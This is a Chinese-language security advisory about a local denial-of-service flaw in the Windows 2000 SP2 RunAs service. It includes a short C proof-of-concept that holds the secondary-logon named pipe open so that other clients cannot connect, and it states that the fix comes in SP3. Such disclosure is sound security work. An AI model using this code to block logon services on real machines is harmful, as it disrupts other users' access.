Microsoft Windows 2000 RunAs 拒绝服务攻击发布时间:2001-10-13 更新时间:2001-11-13 严重程度:中 威胁程度:本地拒绝服务 错误类型:设计错误 利用方式:服务器模式 受影响系统 Microsoft Windows 2000 SP2详细描述 Windows 2000 RunAs 服务允许应用程序或者服务以不同用户执行,它通过按住shift键并右键点击图标,然后选择'Run as..'访问。 当服务被调用的时候,它使用指定服务器建立有名管道会话进程用来认证,RunAs服务一个时间里只运行一个这样的会话进程,如果客户端在服务器上建立这种不请求任何服务的管道,其他客户端就不能再连接这个服务。 测试代码 // radix1112200103.c - Camisade - Team RADIX - 11-12-2001 // // Camisade (www.camisade.com) is not responsible for the use or // misuse of this proof of concept source code. #define WIN32_LEAN_AND_MEAN #define UNICODE #define _UNICODE #include <windows.h> #include <tchar.h> #include <stdio.h> #include <conio.h> #define SECLOGON_PIPE _T("\\\\.\\pipe\\secondarylogon") void main() { HANDLE hPipe; hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0); if (hPipe == INVALID_HANDLE_VALUE) { printf("Unable to open pipe, error %d\n", GetLastError()); return; } printf("Connected to pipe. Press any key to disconnect.\n"); getche(); CloseHandle(hPipe); } -------------------- --------------------------------------------- 解决方案 此补丁将在Service Pack3上修补。 相关信息 参考:http://www.camisade.com/research/reports/radix1112200103.html |
